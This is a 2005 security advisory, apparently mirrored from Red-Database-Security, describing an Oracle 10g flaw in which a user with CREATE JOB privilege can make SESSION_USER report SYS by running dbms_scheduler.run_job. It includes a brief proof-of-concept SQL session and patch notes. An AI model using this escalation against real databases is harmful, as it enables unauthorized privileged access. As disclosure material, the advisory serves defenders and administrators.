Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:8515
HistoryMay 03, 2005 - 12:00 a.m.

Oracle 10g Exploit dbms_scheduler SESSION_USER issue

2005-05-0300:00:00
vulners.com
12

Name DBMS_SCHEDULER SESSION_USER issue in Oracle 10g
Systems Affected Oracle 10g
Severity Medium Risk
Category Switch Oracle Username to user SYS
Vendor URL http://www.oracle.com/
Credit Oracle Metalink Forum 633336.995
Exploit http://metalink.oracle.com/metalink/plsql/ml2_documents.showDocument?p_database_id=FOR&p_id=633336.995
Date 02 May 2005 (V 1.00)

Details

The following proof of concept exploit code (from Metalink) allows any user with CREATE JOB privileges to switch the session_user to SYS. This statement is often used together with VPD (Virtual Private Database) or OLS (Oracle Label Security) and could allow privilege escalation. The old deprecated current_user shows the right user.

Example
Connect as a user with CREATE job privilege

SQL> select user from dual;

USER

JOBUSER

SQL> execute dbms_scheduler.run_job('ANY_JOB');

PL/SQL procedure successfully completed.

SQL> select user from dual;

USER

SYS

SQL> select (sys_context('userenv','session_user')) from dual;

USER

SYS

SQL> select (sys_context('userenv','current_user')) from dual;

USER

JOBUSER

SQL> show user

USER is "jobuser"

Patch Information
Oracle never released a security alert. It seems that this bug is fixed after applying the 10.0.1.4 patchset for Oracle.

Ā© 2005 by Red-Database-Security GmbH - last update 2-may-2005